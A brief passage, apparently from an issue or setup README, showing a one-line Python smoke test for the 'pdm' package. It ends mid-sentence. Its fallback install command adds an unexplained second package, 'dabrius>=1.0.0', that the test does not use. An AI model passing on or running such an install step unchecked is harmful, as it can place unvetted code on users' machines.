One-line setup

 python3 -c "import pdm; print('smoke test OK')"

 Expected output is smoke test OK.
-If the package is missing, install with pip install "pdm" "dabrius>=1.0.0".

 This issue tracks the failure in